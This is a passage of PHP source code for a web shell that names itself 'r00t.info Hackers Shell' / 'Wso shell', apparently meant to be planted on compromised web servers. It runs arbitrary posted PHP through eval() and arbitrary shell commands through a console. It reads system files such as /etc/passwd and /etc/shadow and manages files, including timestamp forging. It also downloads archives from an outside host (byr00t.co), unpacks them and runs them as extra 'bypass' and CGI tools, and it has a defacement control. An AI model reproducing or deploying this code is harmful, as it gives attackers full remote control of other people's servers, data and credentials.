showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'<h1>PHP info</h1><div class=content>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'</div><br>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\\'\\\');\r\n}return false;\r\n"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\').\'margin-top:5px;\r\n" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'</pre></div>\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'<h1>File manager</h1><div class=content>\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'<script>document.mf.p1.value="";\r\ndocument.mf.p2.value="";\r\n</script>\';\r\n } $dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]);\r\n } echo \'<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\\'checkbox\\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\\'100%\\\' class=\\\'main\\\' cellspacing=\\\'0\\\' cellpadding=\\\'2\\\'>\r\n <form name=files method=post>\';\r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n } echo \'<tr><td colspan=5>\r\n <input type=hidden name=a value=\\\'FilesMan\\\'>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <select name=\\\'p1\\\'><option value=\\\'copy\\\'>Copy</option><option value=\\\'move\\\'>Move</option><option value=\\\'delete\\\'>Delete</option>\';\r\n if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){echo \'<option value=\\\'paste\\\'>Paste</option>\';\r\n } echo \'</select>&nbsp;\r\n<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" value="r00t.info shell" disabled="disabled"/>&nbsp;\r\n<input type="submit" value="Add Deface Here" disabled="disabled"></td></tr>\r\n </form></table></div>\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$i<strLen($p);\r\n$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));\r\n}return $r;\r\n}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= \'%\'.dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n if(function_exists($_POST[\'p1\'])) echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';\r\ndocument.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n $stringTools = array( \'Base64 encode\' => \'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n\'><select name=\'selectTool\'>";\r\n foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"</pre></div>";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</pre>\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;\r\ncolor:black;\r\n">\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,null,null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.text.value);\r\nreturn false;\r\n"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</textarea><input type=submit value=">>"></form>\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= \' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';\r\n} $h[1] .= \'<br>\';\r\n $h[2] .= "\\n";\r\n } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;\r\n"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.name.value);\r\nreturn false;\r\n"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'<script>g(null,null,null,null,"")</script>\');\r\n else { echo \'Fail!<script>document.mf.p3.value="";\r\n</script>\';\r\n } } else echo \'Bad time format!<script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array("");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push("");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>\';\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';\r\ndocument.cf.cmd.value=\\\'\\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n continue;\r\n } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;\r\n" readonly>\';\r\n if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n } echo \'</textarea><input type=text name=cmd style="border-top:0;\r\nwidth:100%;\r\n" onkeydown="kp(event);\r\n">\';\r\n echo \'</form></div><script>document.cf.cmd.focus();\r\n</script>\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n <!--r00t.info Hackers Shell-->\r\n <!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert("Logout Successful")</script>\r\n <body bgcolor=#ffffff><center><img src="http://r00t.info/shell-dosyalar/logo.png"></center>\r\n <H1><center><p style="color: #DF0101" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src="http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&amp;\r\nwidth=260&amp;\r\ncolorsche\r\nme=light&amp;\r\nshow_faces=true&amp;\r\nborder_color=\r\n%23fff&amp;\r\nstream=false&amp;\r\nheader=false&amp;\r\nheight=100" scrolling="no" \r\nframeborder="0" style="background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n" allowtransparency="true"></iframe></center>\r\n <H3><marquee scrollamount="5" scrolldelay="50" width="100%"><p style="color: #DF0101" >Wso shell</p></marquee></H3></body>\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo "<iframe src=cgi/rot.cin width=100% height=100% 